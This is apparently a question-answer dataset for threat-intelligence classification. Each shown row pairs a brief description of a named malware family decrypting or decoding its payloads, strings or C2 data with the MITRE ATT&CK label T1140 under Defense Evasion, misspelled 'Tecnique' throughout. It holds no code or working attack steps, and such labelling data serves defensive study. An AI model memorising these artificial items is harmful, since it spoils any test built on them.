+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ABK has the ability to decrypt AES encrypted payloads.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Action RAT can use Base64 to decode actor-controlled C2 server communications.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has decoded antivirus name strings.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has decoded files received from a C2.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can decode its payload prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to decrypt the loader configuration and payload DLL.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuditCred uses XOR and RC4 to perform decryption on the code functions.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon has decrypted encrypted strings.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avenger has the ability to decrypt files downloaded from C2.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has deobfuscated XOR-encoded strings.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult uses an XOR key to decrypt content and uses Base64 to decode the C2 address.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADFLICK can decode shellcode using a custom rotating XOR cipher.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBK has the ability to decrypt AES encrypted payloads.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT uses Expand to decompress a CAB file into executable content.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has used AES and XOR to decrypt its DLLs.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BOOSTWRITE has used a a 32-byte long multi-XOR key to decode data inside its payload.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BUSHWALK can Base64 decode and RC4 decrypt malicious payloads sent through a web request’s command parameter.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk has the ability to unpack itself into memory using XOR.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has the ability to decode downloaded files prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has used a custom routine to decrypt strings.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has decoded its PowerShell script.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot decodes embedded XOR strings.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can decrypt downloaded payloads. Bazar also resolves strings and other artifacts at runtime.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BendyBear has decrypted function blocks using a XOR key during runtime to evade detection.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has decoded strings in the malware using XOR and RC4.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox can decrypt AES-encrypted files downloaded from C2.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has the ability to deobfuscate its payload prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can deobfuscate C2 server responses and unpack its code on targeted hosts.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore has used openssl to decrypt AES encrypted payload data. Bundlore has also used base64 and RC4 with a hardcoded key to deobfuscate data.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER decodes configuration items from a bundled file for command and control activity.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon decrypts task and configuration files for execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT decodes many of its artifacts and is decrypted (AES-128) after being downloaded.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has decrypted an AES encrypted binary file to trigger the download of other files.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can decrypt downloaded modules prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Chinoxy dropping function can initiate decryption of its config file.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme can decrypt its encrypted internal code.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can deobfuscate its payload prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop has used a simple XOR operation to decrypt strings.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can deobfuscate shellcode using a rolling XOR and decrypt metadata from Beacon sessions.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CoinTicker decodes the initially-downloaded hidden encoded file using OpenSSL.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has used unique per machine passwords to decrypt the orchestrator payload and a hardcoded XOR key to decrypt its communications module. ComRAT has also used a unique password to decrypt the file used for its hidden file system.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti has decrypted its payload using a hardcoded AES-256 key.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner has used Google Chrome's decryption and extraction operations.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CostaBricks has the ability to use bytecode to decrypt embedded payloads.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can decode its encoded PE file prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can decrypt and parse instructions sent from C2.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DDKONG decodes an embedded configuration using XOR.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEADEYE has the ability to combine multiple sections of a binary which were broken up to evade detection into a single .dll prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot can use a VBA macro to decode its payload prior to installation and execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate installation includes binary code stored in a file located in a hidden directory, such as shell.txt, that is decrypted then executed. DarkGate uses hexadecimal-encoded shellcode payloads during installation that are called via Windows API CallWindowProc() to decode and then execute.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can decrypt its payload and associated configuration elements using the Rijndael cipher.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman has the ability to self-extract as a RAR archive.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis will decrypt important strings used for C&C communication.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DropBook can unarchive data downloaded from the C2 to obtain the payload and persistence modules.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Drovorub has de-obsfuscated XOR encrypted payloads in WebSocket messages.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack has used a decryption routine that is part of an executable physical patch.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre decrypts resources needed for targeting the victim.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ecipekac has the ability to decrypt fileless loader modules.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has been decrypted before execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has used a self-extracting RAR file to deliver modules to victims. Emotet has also extracted embedded executables from files using hard-coded buffer offsets.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout can deobfuscate and write malicious ISO files to disk.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Linux can decrypt its configuration file.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Expand can be used to decompress a local or remote CAB file into an executable.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIVEHANDS has the ability to decrypt its payload prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FRAMESTING can decompress data received within `POST` requests.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FYAnti has the ability to decrypt an embedded .NET module.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can decrypt AES encrypted C2 communications.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher extracts and decrypts stage 3 malware, which is stored in encrypted resources.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Final1stspy uses Python code to deobfuscate base64-encoded strings.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb can be decrypted in memory using a Lightweight Encryption Algorithm (LEA)-128 key and decoded using a XOR key.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GLASSTOKEN has the ability to decode hexadecimal and Base64 C2 requests.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can decompress and decrypt DLLs and shellcode.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax has decoded and decrypted the configuration file when executed.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has used a polymorphic decryptor to decrypt itself at runtime.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can decrypt its encrypted internal strings.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can use multiple custom routines to decrypt strings prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can use a decryption algorithm for strings based on Rotate on Right (RoR) and Rotate on Left (RoL) functionality.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HUI Loader can decrypt and load files containing malicious payloads.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has decoded Base64 encoded URLs to insert a recipient’s name into the filename of the Word document. Hancitor has also extracted executables from ZIP files.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can decompress and copy driver files using `LZCopy`.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor can decrypt its payload prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HiddenWasp uses a cipher to implement a decoding function.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has decrypted ELF files with AES.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperBro can unpack and decrypt its payload prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ISMInjector uses the certutil command to decode a payload file.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple can use a Base64-encoded AES key to decrypt tasking.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has decoded malware components that are then dropped to the system.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer decrypts code to connect to a remote C2 server.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IronNetInjector has the ability to decrypt embedded .NET and PE payloads.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYPLUG can decode its configuration file to determine C2 protocols.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can decrypt encrypted strings and write them to a newly created folder.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has deobfuscated itself before executing its commands.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has used certutil to download and decode base64 encoded strings and has also devoted a custom section to performing all the components of the deobfuscation process.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kerrdown can decode, decrypt, and decompress multiple layers of shellcode.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel has decrypted the binary's configuration once the main function was launched.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos decrypts strings right after the initial communication, but before the authentication process.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs decrypts and extracts a copy of its main DLL payload when executing.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LIGHTWIRE can RC4 decrypt and Base64 decode C2 commands.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron has used AES and XOR to decrypt configuration files and commands.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke has the ability to decrypt and decode multiple layers of obfuscation.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can decrypt its configuration data.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has decoded and decrypted its stages multiple times using hard-coded keys to deliver the final payload, and has decoded its server response hex string using XOR.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack has a function that decrypts malicious data.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can decrypt its C2 address upon execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After checking for the existence of two files, keyword_parm.txt and parm.txt, MESSAGETAP XOR decodes and read the contents of the files.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa decrypts a downloaded file using AES-128-EBC with a custom delta.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete’s downloaded data is decrypted using AES.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can decrypt files and data.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex has used a Base64 key to decode its components.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Upon execution, Metamorfo has unzipped itself after being downloaded to the system and has performed string decryption.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MirageFox has a function for decrypting data containing C2 configuration information.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu decrypts its encrypted configuration files prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall has the ability to decrypt its payload prior to execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs will decode malware components that are then dropped to the system.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mori can resolve networking APIs from strings that are ADD-encrypted.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI uses a unique, custom de-obfuscation technique.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NativeZone can decrypt and decode embedded Cobalt Strike beacon stage shellcode.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker's PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the Netwalker DLL being loaded into memory.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Ninja loader component can decrypt and decompress the payload.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads. Versions of OSX/Shlayer pass encrypted and password-protected code to openssl and then write the payload to the /tmp folder.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D uses a decode routine combining bit shifting and XOR operations with a variable key that depends on the length of the string that was encoded. If the computation for the variable XOR key turns out to be 0, the default XOR key of 0x1B is used. This routine is also referenced as the `rotate` function in reporting.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum's loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption.","Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OnionDuke can use a custom decryption algorithm to decrypt strings.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell can use a decryption mechanism to process a user supplied password and allow execution.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PITSTOP can deobfuscate base64 encoded and AES encrypted commands.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can deobfuscate the main backdoor code.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PS1 can use an XOR key to decrypt a PowerShell loader and payload binary.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY has used PowerShell to decode base64-encoded assembly.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare has decrypted its strings by applying a XOR operation and a decompression using a custom implemented LZM algorithm.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint has been decompressed by included shellcode prior to being launched.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull can decrypt received data from its C2 server by using AES.,"Tecnique: T1140 Deobfuscate/Decode Files or Information, Tactic: TA0005 Defense Evasion"
